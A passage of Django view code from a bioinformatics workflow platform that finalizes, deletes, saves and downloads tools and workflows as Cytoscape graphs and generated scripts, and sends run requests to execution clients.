#print (' Graph After Deletion of nodes and edges:')
#print (simplejson.dumps(graph, indent=4))
# Add the edges of the graph
#print (' Edges to add:')
#print (simplejson.dumps(self.graph['elements']['edges'], indent=4))
graph['elements']['edges'].extend(self.graph['elements']['edges'])
# Add the nodes of this graph
# Make sure that they have the right belongto info
nodes_to_add = self.graph['elements']['nodes']
for node_to_add in nodes_to_add:
node_to_add['data']['belongto'] = tool_node_belongto
#print (' Nodes to add:')
#print (simplejson.dumps(nodes_to_add, indent=4))
graph['elements']['nodes'].extend(nodes_to_add)
#print (' Graph after adding new tool dependencies')
#print (simplejson.dumps(graph, indent=4))
# Save the graph
workflow_using_me.workflow = simplejson.dumps(graph)
workflow_using_me.save()
# Check graph <--> model consistency
self.__consistency_check_graph_model(graph, workflow_using_me)
@has_data
def ro_finalize_delete(request, **kwargs):
'''
Called from ro_finalize_delete/
if action is FINALIZE:
finalize a tool/workflow (from draft to no draft!)
if action is DELETE
DELETE a tool/workflow
ro: tool or workflow
'''
ro = kwargs.get('ro', '')
if not ro:
return fail('Error 5476')
if not ro in ['tool', 'workflow']:
return fail('Error 5477')
action = kwargs.get('action', '')
if not action in ['FINALIZE', 'DELETE']:
return fail('Error 5475')
# Get the user
try:
obc_user = OBC_user.objects.get(user=request.user)
except ObjectDoesNotExist as e:
return fail('Error 5472')
if ro == 'tool':
tools_info_name = kwargs.get('tools_info_name', '')
if not tools_info_name:
return fail('Error 5467')
tools_info_version = kwargs.get('tools_info_version', '')
if not tools_info_version:
return fail('Error 5468')
tools_info_edit = kwargs.get('tools_info_edit', '')
if not tools_info_edit:
return fail('Error 5469')
try:
tools_info_edit = int(tools_info_edit)
except ValueError as e:
return fail('Error 5470')
# Get the tool
try:
tool = Tool.objects.get(name=tools_info_name, version=tools_info_version, edit=tools_info_edit)
except ObjectDoesNotExist as e:
return fail('Error 5471')
# Is the user who created the tool, the same as the user who wants to edit/delete it?
if not tool.obc_user == obc_user:
return fail('Error 5473')
if not tool.draft:
return fail('Error 5474')
if action == 'FINALIZE':
# Does it depend on any tool that is draft?
draft_dependencies = [t for t in tool_get_dependencies_internal(tool, include_as_root=False) if t['dependency'].draft]
if draft_dependencies:
return fail('This tool cannot be finalized. It depends from {} draft tool(s). For example: {}'.format(len(draft_dependencies), str(draft_dependencies[0]['dependency'])))
tool.draft = False
tool.save()
WJ = WorkflowJSON()
WJ.update_tool(tool)
elif action == 'DELETE':
# Is there any other tool that depends from this tool?
dependendants = Tool.objects.filter(dependencies__in=[tool])
if dependendants.count():
return fail('This tool cannot be deleted. There are {} tool(s) that depend on this tool. For example: {}'.format(dependendants.count(), dependendants.first()))
# Is there any workflow that contains this tool?
w = Workflow.objects.filter(tools__in=[tool])
if w.count():
return fail('This tool cannot be deleted. It is used in {} workflow(s). For example: {}'.format(w.count(), str(w.first())))
# Get the tools that are forks of this tool
tool_forks = Tool.objects.filter(forked_from=tool)
# Get the tool that this tool is forked from
tool_forked_from = tool.forked_from
# All the tools that are forked from this tool are now forked from the tool that this tool was forked from!
for tool_fork in tool_forks:
tool_fork.forked_from = tool_forked_from
tool_fork.save()
# Delete the comment
tool.comment.delete()
# Delete the tool
tool.delete()
return success()
elif ro == 'workflow':
workflow_info_name = kwargs.get('workflow_info_name', '')
if not workflow_info_name:
return fail('Error 5478')
workflow_info_edit = kwargs.get('workflow_info_edit', '')
if not workflow_info_edit:
return fail('Error 5479')
try:
workflow_info_edit = int(workflow_info_edit)
except ValueError as e:
return fail('Error 5480')
# Get the workflow
try:
workflow = Workflow.objects.get(name=workflow_info_name, edit=workflow_info_edit)
except ObjectDoesNotExist as e:
return fail('Error 5481')
#Is the user who created the workflow the same as the one who wants to edit/delete it?
if obc_user != workflow.obc_user:
return fail('Error 5482')
# Basic sanity check..
if not workflow.draft:
return fail('Error 5483')
if action == 'FINALIZE':
# Does it contain any tool that it is draft?
t = workflow.tools.filter(draft=True)
if t.count():
return fail('This workflow cannot be finalized. It contains {} draft tool(s). For example: {}'.format(t.count(), str(t.first())))
# Does it contain any draft workflow?
w = workflow.workflows.filter(draft=True)
if w.count():
return fail('This workflow cannot be finalized. It contains {} draft workflow(s). For example: {}'.format(w.count(), str(w.first())))
workflow.draft = False
workflow.save()
#workflow_has_changed(workflow) # Update other workflows that are using this
WJ = WorkflowJSON()
WJ.update_workflow(workflow) # TODO limit action to finalize!
elif action == 'DELETE':
# Is there any workflow that contains this workflow?
w = Workflow.objects.filter(workflows__in = [workflow])
if w.count():
return fail('This workflow cannot be deleted. It is used in {} workflow(s). For example: {}'.format(w.count(), str(w.first())))
# Get the workflows that are forks of this workflow
workflow_forks = Workflow.objects.filter(forked_from=workflow)
# Get the workflow that this workflow is forked from
workflow_forked_from = workflow.forked_from
# All the workflows that are forked from this workflow are now forked from the workflow that this workflow was forked from!
for workflow_fork in workflow_forks:
workflow_fork.forked_from = workflow_forked_from
workflow_fork.save()
# Delete the comments
workflow.comment.delete()
# Delete the workflow
workflow.delete()
return success()
def create_workflow_edge_id(source_id, target_id):
'''
ATTENTION!!!!
This should be in accordance with the javascript code: File: ui.js
/*
* Create a "unique" id for an edge
*/
function create_workflow_edge_id(source_id, target_id) {
return source_id + '..' + target_id;
}
'''
return source_id + '..' + target_id
def create_workflow_id(workflow):
'''
ATTENTION!!
This should be in accordnace with the javascript code: File: ui.js
/*
* Creates a "unique" id from a workflow
*/
function create_workflow_id(workflow) {
return workflow.name + '__' + workflow.edit; //It is ok if this is wf1__null
}
'''
if isinstance(workflow, Workflow):
return create_workflow_id({'name': workflow.name, 'edit': workflow.edit})
return workflow['name'] + '__' + str(workflow['edit'])
def set_edit_to_cytoscape_json(cy, edit, workflow_info_name):
'''
Perform the following tasks:
* Set the edit number of the workflow to all nodes/edges
* Change the id of the root workflow from "root" to workflow_info_name
'''
# Get the root workflow node
new_worfklow_node = [x for x in cy['elements']['nodes'] if x['data']['type']=='workflow' and not x['data']['edit']]
assert len(new_worfklow_node) == 1
assert new_worfklow_node[0]['data']['name'] == 'root'
# Set the edit value
new_worfklow_node[0]['data']['edit'] = edit
# Set the label value
new_worfklow_node[0]['data']['label'] = workflow_label_cytoscape(None, workflow_info_name, edit)
belongto = {
'name': workflow_info_name,
'edit': edit,
}
belongto_id = create_workflow_id(belongto)
for node in cy['elements']['nodes']:
if not node['data']['belongto'] is None:
if not node['data']['belongto']['edit']:
node['data']['belongto'] = belongto
if 'name' in node['data']:
if node['data']['name'] == 'root':
node['data']['name'] = workflow_info_name
if '__null' in node['data']['id']:
node['data']['id'] = node['data']['id'].replace('__null', '__' + str(edit))
if 'root__' in node['data']['id']:
node['data']['id'] = node['data']['id'].replace('root__', workflow_info_name + '__')
#Change the bash
if 'bash' in node['data']:
node['data']['bash'] = node['data']['bash'].replace('__null', '__' + str(edit))
node['data']['bash'] = node['data']['bash'].replace('root__', workflow_info_name + '__')
# Set to step-->Step
if 'steps' in node['data']:
for step_i, _ in enumerate(node['data']['steps']):
if '__null' in node['data']['steps'][step_i]:
node['data']['steps'][step_i] = node['data']['steps'][step_i].replace('__null', '__' + str(edit))
if 'root__' in node['data']['steps'][step_i]:
node['data']['steps'][step_i] = node['data']['steps'][step_i].replace('root__', workflow_info_name + '__')
# Set to step-->inputs
if 'inputs' in node['data']:
for input_i, _ in enumerate(node['data']['inputs']):
if '__null' in node['data']['inputs'][input_i]:
node['data']['inputs'][input_i] = node['data']['inputs'][input_i].replace('__null', '__' + str(edit))
if 'root__' in node['data']['inputs'][input_i]:
node['data']['inputs'][input_i] = node['data']['inputs'][input_i].replace('root__', workflow_info_name + '__')
# Set to step->outputs
if 'outputs' in node['data']:
for output_i, _ in enumerate(node['data']['outputs']):
if '__null' in node['data']['outputs'][output_i]:
node['data']['outputs'][output_i] = node['data']['outputs'][output_i].replace('__null', '__' + str(edit))
if 'root__' in node['data']['outputs'][output_i]:
node['data']['outputs'][output_i] = node['data']['outputs'][output_i].replace('root__', workflow_info_name + '__')
if 'edges' in cy['elements']:
for edge in cy['elements']['edges']:
if '__null' in edge['data']['source']:
edge['data']['source'] = edge['data']['source'].replace('__null', '__' + str(edit))
if 'root__' in edge['data']['source']:
edge['data']['source'] = edge['data']['source'].replace('root__', workflow_info_name + '__')
if '__null' in edge['data']['target']:
edge['data']['target'] = edge['data']['target'].replace('__null', '__' + str(edit))
if 'root__' in edge['data']['target']:
edge['data']['target'] = edge['data']['target'].replace('root__', workflow_info_name + '__')
if '__null' in edge['data']['id']:
edge['data']['id'] = create_workflow_edge_id(edge['data']['source'], edge['data']['target'])
def check_workflow_step_main(cy, root_workflow):
'''
It should be one and only one main step on the main workflow
'''
main_counter = 0
for node in cy['elements']['nodes']:
if node['data']['type'] == 'step':
if node['data']['belongto'] == root_workflow:
if node['data']['main']:
main_counter += 1
return main_counter
@has_data
def workflows_add(request, **kwargs):
'''
add workflow, workflow add, save workflow, workflow save, save wf
edit workflow edit update workflow
'''
if request.user.is_anonymous: # Server should always check..
return fail('Please login to create new workflow')
if not user_is_validated(request):
return fail('Please validate your email to create new workflows ' + validate_toast_button());
obc_user = OBC_user.objects.get(user=request.user)
workflow_info_name = kwargs.get('workflow_info_name', '')
if not workflow_info_name.strip():
return fail('Invalid workflow name')
workflow_info_forked_from = kwargs['workflow_info_forked_from'] # If it does not exist, it should raise an Exception
workflow_edit_state = kwargs.get('workflow_edit_state', '')
if not type(workflow_edit_state) is bool:
return fail('Error 4877')
upvoted = False
downvoted = False
workflow_forked_from = None
workflow_changes = None
if workflow_edit_state:
# We are editing this workflow
# Get the edit
workflow_info_edit = kwargs.get('workflow_info_edit', '')
# Is this an int?
try:
workflow_info_edit = int(workflow_info_edit)
except ValueError as e:
return fail('Error 4878')
# Does this workflow exist?
try:
w = Workflow.objects.get(name=workflow_info_name, edit=workflow_info_edit)
except ObjectDoesNotExist as e:
return fail('Error 4879')
# Basic sanity check. We shouldn't be able to edit a workflow which is not a draft..
if not w.draft:
return fail('Error 4880')
# Is the creator of the workflow the same as the user who edits it?
if obc_user != w.obc_user:
return fail('Error 4881')
# Store a reference to the comments
comment = w.comment
# Store upvotes/downvotes
upvotes = w.upvotes
downvotes = w.downvotes
# Store votes
votes = UpDownWorkflowVote.objects.filter(workflow=w)
# Disassociate from this tool and get upvoted/downvoted status
for vote in votes:
if vote.obc_user == obc_user:
upvoted = vote.upvote
downvoted = not upvoted
vote.workflow = None
vote.save()
# Get the workflows that are forks of this workflow
workflow_forks = Workflow.objects.filter(forked_from=w)
# Temporary set that these workflows are not forked from any workflow
for workflow_fork in workflow_forks:
workflow_fork.forked_from = None
workflow_fork.save()
# Get the workflow that this workflow is forked from
workflow_forked_from = w.forked_from
# Get the created at. It needs to be sorted according to this, otherwise the jstree becomes messy
workflow_created_at = w.created_at
# Get the workflows that use this workflow
workflows_using_this_workflow = Workflow.objects.filter(workflows__in = [w])
# Remove this workflow from these workflows
for workflow_using_this_workflow in workflows_using_this_workflow:
workflow_using_this_workflow.workflows.remove(w)
workflow_using_this_workflow.save()
# Delete it!
w.delete()
else:
# This is a new workflow
upvotes = 0
downvotes = 0
workflow_changes = kwargs.get('workflow_changes', None)
if workflow_info_forked_from:
if not workflow_changes:
return fail('Edit Summary cannot be empty')
workflow_forked_from = Workflow.objects.get(name=workflow_info_forked_from['name'], edit=workflow_info_forked_from['edit'])
else:
pass # Do nothing
workflow_website = kwargs.get('workflow_website', '')
if workflow_website:
if not valid_url(workflow_website):
return fail('website is not a valid URL')
workflow_description = kwargs.get('workflow_description', '')
if not workflow_description.strip():
return fail('Description cannot be empty')
workflow_description_html = markdown(workflow_description)
workflow = kwargs.get('workflow_json', '')
#print ('Workflow from angular:')
#print (simplejson.dumps(workflow, indent=4))
if not workflow:
return fail ('workflows json object is empty') # This should never happen!
if not workflow['elements']:
return fail('workflow graph cannot be empty')
# Client sents the root workflow node.
# When we save we make root False so that it is easier to import it later
#workflow_root_node = [x for x in workflow['elements']['nodes'] if x['data']['type']=='workflow' and x['data']['root']]
#if len(workflow_root_node) != 1:
# return fail('Error 28342')
#workflow_root_node[0]['data']['root'] = False
#Check that one and only one step is main
if workflow_edit_state:
next_edit = workflow_info_edit
else:
#Get the maximum version. FIXME DUPLICATE CODE
workflow_all = Workflow.objects.filter(name__iexact=workflow_info_name)
if not workflow_all.exists():
next_edit = 1
else:
max_edit = workflow_all.aggregate(Max('edit'))
next_edit = max_edit['edit__max'] + 1
#Change the edit value in the cytoscape json object
set_edit_to_cytoscape_json(workflow, next_edit, workflow_info_name)
# print ('Workflow from set_edit:')
# print (simplejson.dumps(workflow, indent=4))
#print (simplejson.dumps(workflow, indent=4))
main_counter = check_workflow_step_main(workflow, {'name':workflow_info_name, 'edit': next_edit })
if main_counter == 0:
return fail('Could not find main step. One step needs to be declared as "main"')
if main_counter > 1:
return fail('Error 49188') # This should never happen
new_workflow = Workflow(
obc_user=obc_user,
name = workflow_info_name,
edit = next_edit,
website = workflow_website,
description = workflow_description,
description_html = workflow_description_html,
# FIXME !! SERIOUS!
# This is redundand. We do json.loads and then json.dumps.
# On the other hand, how else can we check if elements are not empty? (perhaps on the backend..)
workflow = simplejson.dumps(workflow),
forked_from = workflow_forked_from,
changes = workflow_changes,
upvotes = upvotes,
downvotes = downvotes,
draft = True, # We always save new workflows as draft.
)
#Save it
new_workflow.save()
if workflow_edit_state:
# Preserve the created at date. We have to do that AFTER the save! https://stackoverflow.com/questions/7499767/temporarily-disable-auto-now-auto-now-add
new_workflow.created_at = workflow_created_at
new_workflow.save()
# Get all tools that are used in this workflow except the ones that are disconnected
tool_nodes = [x for x in workflow['elements']['nodes'] if (x['data']['type'] == 'tool') and (not x['data']['disconnected'])]
tools = [Tool.objects.get(name=x['data']['name'], version=x['data']['version'], edit=x['data']['edit']) for x in tool_nodes]
if tools:
new_workflow.tools.add(*tools)
new_workflow.save()
# Get all workflows that are used in this workflow
workflow_nodes = [x for x in workflow['elements']['nodes'] if x['data']['type'] == 'workflow']
# print (simplejson.dumps(workflow_nodes, indent=4))
# Remove self workflow and workflows that are disconnected
workflow_nodes = [
{'name': x['data']['name'], 'edit': x['data']['edit']}
for x in workflow_nodes if
(not (x['data']['name'] == workflow_info_name and x['data']['edit'] == next_edit)) and (not x['data']['disconnected'])
]
# Get workflow database objects
workflows = [Workflow.objects.get(**x) for x in workflow_nodes]
if workflows:
new_workflow.workflows.add(*workflows)
new_workflow.save()
# Add keywords
keywords = [Keyword.objects.get_or_create(keyword=keyword)[0] for keyword in kwargs['workflow_keywords']]
new_workflow.keywords.add(*keywords)
new_workflow.save();
obc_user = OBC_user.objects.get(user=request.user)
if workflow_edit_state:
# Add the votes from the previous edit
for vote in votes:
vote.workflow = new_workflow
vote.save()
# Add the workflows that were forked from this workflow (that was deleted before) to the new workflow
for workflow_fork in workflow_forks:
workflow_fork.forked_from = new_workflow
workflow_fork.save()
# Add to the workflows that were using this workflow, the new workflow
for workflow_using_this_workflow in workflows_using_this_workflow:
#print ('Workflow using this workflow:', str(workflow_using_this_workflow))
workflow_using_this_workflow.workflows.add(new_workflow)
workflow_using_this_workflow.save()
# Update the json graph to the workflows that are using me
WJ = WorkflowJSON()
WJ.update_workflow(new_workflow)
else:
# Add an empty comment. This will be the root comment for the QA thread
comment = Comment(
obc_user = obc_user,
comment = '',
comment_html = '',
title = markdown('Discussion on Workflow: w/{}/{}'.format(workflow_info_name, next_edit)),
parent = None,
upvotes = 0,
downvotes = 0,
)
comment.save()
new_workflow.comment = comment
new_workflow.save()
#print ('AFTER SAVE:')
#print (simplejson.dumps(simplejson.loads(new_workflow.workflow), indent=4))
ret = {
'description_html': workflow_description_html,
'edit': next_edit,
'created_at': datetime_to_str(new_workflow.created_at),
'score': upvotes-downvotes,
'voted': {'up': upvoted, 'down': downvoted},
'workflow_pk': new_workflow.pk, # Used in comments
'workflow_thread': qa_create_thread(new_workflow.comment, obc_user), # Tool comment thread
}
return success(ret)
@has_data
def workflows_search_3(request, **kwargs):
'''
This is triggered when a user drags a workflow from the jstree and drops it in a current workflow
'''
workflow_name = kwargs['workflow_name']
workflow_edit = kwargs['workflow_edit']
workflow = Workflow.objects.get(name__iexact = workflow_name, edit=workflow_edit)
# Get current obc_user
if request.user.is_anonymous:
obc_user = None
else:
obc_user = OBC_user.objects.get(user=request.user)
#Is it voted?
if obc_user:
try:
v = UpDownWorkflowVote.objects.get(obc_user=obc_user, workflow=workflow)
except ObjectDoesNotExist as e:
# It is not voted
workflow_voted = {'up': False, 'down': False}
else:
# It is noted
workflow_voted = {'up': v.upvote, 'down': not v.upvote}
else:
workflow_voted = {'up': False, 'down': False}
ret = {
'username': workflow.obc_user.user.username,
'website': workflow.website,
'description': workflow.description,
'description_html': workflow.description_html,
'created_at': datetime_to_str(workflow.created_at),
'forked_from': workflow_to_json(workflow.forked_from),
'keywords': [keyword.keyword for keyword in workflow.keywords.all()],
'workflow' : simplejson.loads(workflow.workflow),
'changes': workflow.changes,
'workflow_pk': workflow.pk, # Used in comments (QAs)
'workflow_thread': qa_create_thread(workflow.comment, obc_user), # Workflow comment thread
'workflow_score': workflow.upvotes - workflow.downvotes,
'workflow_voted': workflow_voted,
'workflow_comment_id': workflow.comment.pk, # Used to create a permalink to the comments
'workflow_comment_title': workflow.comment.title,
'workflow_comment_created_at': datetime_to_str(workflow.comment.created_at),
'workflow_comment_username': workflow.comment.obc_user.user.username,
'draft': workflow.draft, # Is this a draft workflow?
}
return success(ret)
def workflow_node_cytoscape(workflow, name='root', edit=0):
'''
Create a cytoscape workflow node
Normally it should take a database workflow object and create a cytoscape node
Now it just creates a root workflow cytoscape node
'''
assert not workflow # Not yet implemented
return {
'data': {
'belongto': None,
'edit': edit,
'id': workflow_id_cytoscape(workflow, name, edit),
'label': workflow_label_cytoscape(workflow, name, edit),
'name': name,
'type': 'workflow',
'draft': False, # For consistency. It does not realy makes any difference
'disconnected': False, # For consistency as well.
}
}
def tool_node_cytoscape(tool, tool_depending_from_me=None):
'''
Create a cytoscape tool node
tool: A database object tool node
tool_depending_from_me: If i was added as a dependency, this should be the tool that depends from me. FIXME: REMOVE THIS
'''
if isinstance(tool, Tool):
return {
'data': {
'belongto': {'name': 'root', 'edit': 0},
'dep_id' : tool_id_cytoscape(tool_depending_from_me) if tool_depending_from_me else '#', # Not used in executor
'edit': tool.edit,
'id': tool_id_cytoscape(tool),
'label': tool_label_cytoscape(tool),
'name': tool.name,
'root': 'yes' if tool_depending_from_me else 'no', # Not used in executor. 'yes/no' should be True/False for Christ sake! FIXME
'text': tool_label_cytoscape(tool),
'type': 'tool',
'variables': [{'description': variable.description, 'name': variable.name, 'type': 'variable', 'value': variable.value} for variable in tool.variables.all()],
'installation_commands': tool.installation_commands,
'validation_commands': tool.validation_commands,
'os_choices': [choice.os_choices for choice in tool.os_choices.all()],
'dependencies': [str(t) for t in tool.dependencies.all()],
'version': tool.version,
'draft': tool.draft,
}
}
elif type(tool) is dict:
return {
'data': {
'belongto': {'name': 'root', 'edit': 0},
'dep_id' : tool_id_cytoscape(tool_depending_from_me) if tool_depending_from_me else '#', # See comment above. Not used in executor
'edit': tool['edit'],
'id': tool_id_cytoscape(tool),
'label': tool_label_cytoscape(tool),
'name': tool['name'],
'root' : 'yes' if tool_depending_from_me else 'no', # Not used in executor,
'text': tool_label_cytoscape(tool),
'type': 'tool',
'variables': [{'description': variable['description'], 'name': variable['name'], 'type': 'variable', 'value': variable['value']} for variable in tool['variables']],
'version': tool['version'],
'draft': tool['draft'],
'installation_commands': tool['installation_commands'],
'validation_commands': tool['validation_commands'],
'os_choices': tool['os_choices'],
'dependencies': tool['dependencies'],
}
}
def step_node_cytoscape(name='main'):
'''
Create a cytoscape step node
'''
return {
'data': {
'bash': '',
'belongto': {'name': 'root', 'edit': 0},
'id': step_id_cytoscape('main', None, 'root', None),
'label': step_id_label('main'),
'inputs': [],
'outputs': [],
'steps': [],
'tools': [],
'main': True,
'name': step_id_label('main'),
'sub_main': False,
'type': 'step',
}
}
def edge_cytoscape(source, target):
'''
Create a cytscape edge object
'''
return {
'data': {
'source': source['data']['id'],
'target': target['data']['id'],
'id': create_workflow_edge_id(source['data']['id'], target['data']['id']),
},
'position': {
'x': 0,
'y': 0,
},
'group': 'edges',
'removed': False,
'selected': False,
'selectable': True,
'locked': False,
'grabbable': True,
'classes': '',
}
@has_data
def download_tool(request, **kwargs):
'''
Create a cytoscape workflow that installs a given tool.
Kind of a "fake" workflow that the only thing that it does is install a tool (and its dependencies)
It is called by download_workflow when the user selects to "download" a tool instead of a workflow
'''
workflow = {
'elements': {
'nodes': [],
'edges': [],
}
}
# Add root workflow
workflow_node = workflow_node_cytoscape(None)
workflow['elements']['nodes'].append(workflow_node)
# this does not contain recursively all the dependencies. Only the first level
root_tool_dependencies = kwargs['tool_dependencies']
root_tool_objects = [Tool.objects.get(name=t['name'], version=t['version'], edit=t['edit']) for t in root_tool_dependencies]
all_dependencies_str = list(map(str, root_tool_objects))
# Add this tool
tool = {
'name': str(kwargs['tools_search_name']) if str(kwargs['tools_search_name']) else 'T',
'version': str(kwargs['tools_search_version']) if str(kwargs['tools_search_version']) else '0',
'edit': kwargs['tools_search_edit'] if kwargs['tools_search_edit'] else 0, # If this is editable, then the edit is 0
'variables': [variable for variable in kwargs['tool_variables'] if variable['name'] and variable['value'] and variable['description']],
'draft': kwargs['tool_draft'],
'installation_commands': kwargs['tool_installation_commands'],
'validation_commands': kwargs['tool_validation_commands'],
'os_choices': kwargs['tool_os_choices'],
'dependencies': all_dependencies_str,
}
this_tool_cytoscape_node = tool_node_cytoscape(tool)
#print (this_tool_cytoscape_node)
workflow['elements']['nodes'].append(this_tool_cytoscape_node)
# Add an edge between the root workflow and this tool
workflow['elements']['edges'].append(edge_cytoscape(workflow_node, this_tool_cytoscape_node))
# build all tool nodes for dependency tools
all_ids = set()
all_dependencies_str = []
for root_tool_obj in root_tool_objects:
# This is a first level dependency
root_tool_node = tool_node_cytoscape(root_tool_obj)
# Get all dependencies recursively for this tool
root_tool_all_dependencies = tool_get_dependencies_internal(root_tool_obj, include_as_root=True)
for root_tool_all_dependency in root_tool_all_dependencies:
# For each dependency create a cytoscape node
cytoscape_node = tool_node_cytoscape(root_tool_all_dependency['dependency'])
if not cytoscape_node['data']['id'] in all_ids: # An id should exist only once in the graph.... FIXME all_ids is always empty!
workflow['elements']['nodes'].append(cytoscape_node)
# Connect this tool with its dependent tool node
if root_tool_all_dependency['dependant']:
workflow['elements']['edges'].append(edge_cytoscape(cytoscape_node, tool_node_cytoscape(root_tool_all_dependency['dependant'])))
else:
# This is a dependency of the root tool!
workflow['elements']['edges'].append(edge_cytoscape(cytoscape_node, this_tool_cytoscape_node))
# Create a step node
step_node = step_node_cytoscape('main')
workflow['elements']['nodes'].append(step_node)
# Connect it with the root workflow
workflow['elements']['edges'].append(edge_cytoscape(workflow_node, step_node))
return download_workflow(request, **{
'workflow_options': {},
'workflow': None,
'download_type': kwargs.get('download_type', 'BASH'),
'workflow_cy': workflow,
'workflow_info_editable': False,
})
@has_data
def download_workflow(request, **kwargs):
'''
Defined in urls.py:
path('download_workflow/', views.download_workflow), # Acceps a workflow_options and workflow object. Runs a workflow
https://docs.djangoproject.com/en/2.2/ref/request-response/#telling-the-browser-to-treat-the-response-as-a-file-attachment
kwargs['workflow'] = {'name': <workflow_name>, 'edit': <workflow_edit>}
kwargs['workflow_cy'] is the cytoscape workflow
Note: Everyone can download a workflow!
'''
workflow_arg = kwargs['workflow']
workflow_options_arg = kwargs['workflow_options']
download_type = kwargs['download_type'] # For a full list of types see below . if download_type == ...
workflow_info_editable = kwargs['workflow_info_editable'] # IS this workflow saved or not ? . TRUE: NOT SAVED
workflow_id = kwargs.get('workflow_id')
workflow_obc_client = kwargs.get('obc_client', False)
#print ('Name:', workflow_arg['name'])
#print ('Edit:', workflow_arg['edit'])
#print ('editable:', workflow_info_editable)
if workflow_info_editable:
# This workflow has not been saved!
workflow = kwargs.get('workflow_json', '')
workflow_name = workflow_arg.get('name', '')
if not workflow_name:
workflow_name = 'W'
workflow_edit = 0
set_edit_to_cytoscape_json(workflow, workflow_edit, workflow_name)
main_counter = check_workflow_step_main(workflow, {'name':workflow_name, 'edit': workflow_edit})
if main_counter == 0:
return fail('Could not find main step. One step needs to be declared as "main"')
if main_counter > 1:
return fail('Error 49188') # This should never happen
workflow_cy = workflow
workflow = None
elif workflow_arg:
# This is a workflow saved
workflow = Workflow.objects.get(**workflow_arg)
workflow_cy = simplejson.loads(workflow.workflow)
else:
# This is a tool
workflow = None
workflow_cy = kwargs['workflow_cy']
#print (workflow_cy)
# Create a new Report object
if (not user_is_validated(request)) or (not workflow) or (workflow.draft):
'''
If :
user is anonymous or
with non-validated email or
not saved workflow or
this is a tool run (workflow is None) or
workflow is draft
then:
we do not create a report!
'''
run_report = None
nice_id = None
token = None
report_created = False # Do we create a report upon execution of this workflow?
else:
run_report = Report(
obc_user = OBC_user.objects.get(user=request.user),
workflow = workflow,
)
# Attach a new report_id to it
run_report.save()
nice_id = str(run_report.nice_id)
report_token = ReportToken(status=ReportToken.UNUSED, active=True)
report_token.save()
#print ('Report ID:')
#print (report_id)
run_report.tokens.add(report_token)
run_report.save()
token = str(report_token.token)
report_created = True
output_object = {
'arguments': workflow_options_arg,
'workflow': workflow_cy,
'token': token,
'nice_id': nice_id,
}
#output_object = simplejson.dumps(output_object) # .replace('#', 'aa')
#output_object = escape(simplejson.dumps(output_object))
#print ('output_object')
#print (output_object)
#response = HttpResponse(the_script, content_type='application/x-sh')
#response['Content-Disposition'] = 'attachment; filename="script.sh"'
ret = {}
server_url = get_server_url(request)
try:
if download_type == 'JSON':
output_object = urllib.parse.quote(simplejson.dumps(output_object))
ret['output_object'] = output_object
elif download_type == 'BASH':
output_object = urllib.parse.quote(create_bash_script(output_object, server_url, 'sh'))
ret['output_object'] = output_object
elif download_type == 'CWLTARGZ':
output_object = urllib.parse.quote(create_bash_script(output_object, server_url, 'cwltargz'))
ret['output_object'] = output_object
elif download_type == 'CWLZIP':
output_object = urllib.parse.quote(create_bash_script(output_object, server_url, 'cwlzip',))
ret['output_object'] = output_object
elif download_type == 'AIRFLOW':
output_object = urllib.parse.quote(create_bash_script(output_object, server_url, 'airflow', workflow_id=workflow_id, obc_client=workflow_obc_client))
ret['output_object'] = output_object
except OBC_Executor_Exception as e:
return fail(str(e))
ret['report_created'] = report_created
ret['nice_id'] = nice_id
return success(ret)
def callback_url(request):
'''
Buld callbacl url
'''
return f'{request.scheme}://{request.META["HTTP_HOST"]}/platform/'
@has_data
def run_workflow(request, **kwargs):
'''
path('run_workflow/', view.run_workflow)
curl -H "Content-Type: application/json" --request POST --data '{"type":"workflow","name":"test", "edit": "2"}' "http://139.91.81.103:5000/3ee5ccfb744983968fb3e9735e4bb85d/run_workflow"
source: Where the request came from. If it from rest then source='frontend'
'''
if request.user.is_anonymous: # Server should always check..
return fail('Error 3291. User is anonymous')
if not user_is_validated(request):
return fail('Error 3292. User is not validated ' + validate_toast_button());
obc_user = OBC_user.objects.get(user=request.user)
profile_name = kwargs.get('profile_name', '')
if not str(profile_name):
return fail('Error 3288. Invalid profile name')
name = kwargs.get('name', '')
if not str(name):
return fail('Error 3289. Invalid workflow name')
edit = kwargs.get('edit', '')
try:
edit = int(edit)
except ValueError as e:
return fail('Error 3290. Invalid workflow edit')
# Get the client
try:
client = obc_user.clients.get(name=profile_name)
except ObjectDoesNotExist as e:
return fail('Error 3293. Could not get execution client.')
# Get the workflow
try:
workflow = Workflow.objects.get(name=name, edit=edit)
except ObjectDoesNotExist as e:
return fail('Error 3294. Could not get Workflow object.')
url = client.client
#print ('URL FROM DATABASE:', url)
run_url = urllib.parse.urljoin(url + '/', 'run') # https://stackoverflow.com/questions/8223939/how-to-join-absolute-and-relative-urls
nice_id = create_nice_id()
data_to_submit = {
'type': 'workflow',
'name': name,
'edit': edit,
'callback': callback_url(request),
'workflow_id': nice_id,
}
headers={ "Content-Type" : "application/json", "Accept" : "application/json"}
#print ('run_url:', run_url)
#print ('callback:', data_to_submit['callback'])
'''
'''
'''
curl --header "Content-Type: application/json" \
--request GET \
http://139.91.190.239:5000/cfa52d9df5a24345d9f740395e4e69e4/check/id/test
[{"dag_id": "mitsos", "dag_run_url": "/admin/airflow/graph?dag_id=mitsos&execution_date=2020-02-28+13%3A16%3A42%2B00%3A00", "execution_date": "2020-02-28T13:16:42+00:00", "id": 2, "run_id": "manual__2020-02-28T13:16:42+00:00", "start_date": "2020-02-28T13:16:42.710933+00:00", "state": "success"}, {"dag_id": "mitsos", "dag_run_url": "/admin/airflow/graph?dag_id=mitsos&execution_date=2020-02-28+13%3A20%3A44%2B00%3A00", "execution_date": "2020-02-28T13:20:44+00:00", "id": 3, "run_id": "manual__2020-02-28T13:20:44+00:00", "start_date": "2020-02-28T13:20:44.423814+00:00", "state": "success"}, {"dag_id": "mitsos", "dag_run_url": "/admin/airflow/graph?dag_id=mitsos&execution_date=2020-02-28+13%3A24%3A02%2B00%3A00", "execution_date": "2020-02-28T13:24:02+00:00", "id": 4, "run_id": "manual__2020-02-28T13:24:02+00:00", "start_date": "2020-02-28T13:24:02.486982+00:00", "state": "success"}]
'''
# !!!HIGLY EXPERIMENTAL!!!
try:
r = requests.post(run_url, headers=headers, data=simplejson.dumps(data_to_submit))
except requests.exceptions.ConnectionError as e:
return fail('Could not establish a connection with client')
if not r.ok:
#r.raise_for_status()
return fail('Could not send to URL: {} . Error code: {}'.format(run_url, r.status_code))
try:
data_from_client = r.json()
except Exception as e: # Ideally we should do here: except json.decoder.JSONDecodeError as e: but we would have to import json with simp[lejson..]
return fail('Could not parse JSON data from Execution Client.')
#print ('RUN_URL:')
#print (data_from_client)
